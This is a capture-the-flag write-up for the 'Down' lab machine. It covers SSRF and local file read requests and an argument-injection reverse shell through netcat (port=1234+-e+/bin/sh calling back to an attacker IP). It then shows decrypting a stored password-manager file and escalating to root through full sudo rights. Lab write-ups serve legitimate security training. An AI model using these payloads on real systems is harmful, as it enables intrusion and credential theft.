Skip to main content

Machine - Down

Writeup Author: bobbuilder

Overview

Category: Machine

Difficulty: Easy Linux

Machine Author: jkr

Domain: down.vl

Objective: The machine exposes a web interface vulnerable to command injection, which allows initial access. User credentials are later extracted from a local encrypted password manager file. Root access is obtained via full sudo rights.

Enumeration

Nmap Scan

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
  • HTTP Title: Is it down or just me?
  • Interesting file path discovered through testing:
    • /index.php?expertmode=tcp enables raw IP/port-based netcat checks.

Initial Access

Identify Potential LFI and SSRF

Attempt SSRF via POST:

POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

url=http%3A%2F%2F127.0.0.1%2Fserver-status

Test for local file access, which shows the source code:

POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

url=http://127.0.0.1/ file:///var/www/html/index.php

Snippet from index.php

if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
  $ip = trim($_POST['ip']);
  $valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
  $port = trim($_POST['port']);
  $port_int = intval($port);
  $valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
  if ( $valid_ip && $valid_port ) {
    $rc = 255; $output = '';
    $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");

The POST endpoint for expertmode=tcp uses unsanitized nc

/usr/bin/nc -vz $ip $port

Exploit: Reverse Shell via Netcat

Start listener:

nc -lvvp 1234

Trigger reverse shell:

POST /index.php?expertmode=tcp HTTP/1.1

ip=<attacker_ip>&port=1234+-e+/bin/sh

Successful connection:

connect to [me] from (UNKNOWN) [<down_ip>] 37804

Read user flag:

cat user_<REDACTED>.txt

Post-Exploitation

1. Discover Sensitive Files

Run linpeas.sh and look for interesting files:

/home/aleks/.local/share/pswm/pswm

Contents:

<Base64 Encrypted PSWM content>

User Privilege Escalation

1. Decrypt Stored Credentials

Use the following decoder:

  • https://github.com/repo4Chu/pswm-decoder

Run decoder:

python3 exploit.py

Output:

pswm    aleks    flower

Use the password to switch user:

ssh aleks@<down_ip>
# or if already in shell:
su aleks

Root Privilege Escalation

1. Check sudo permissions

sudo -l

Output:

(ALL : ALL) ALL

2. Become root

sudo su

Read root flag:

cat /root/root.txt
Back to top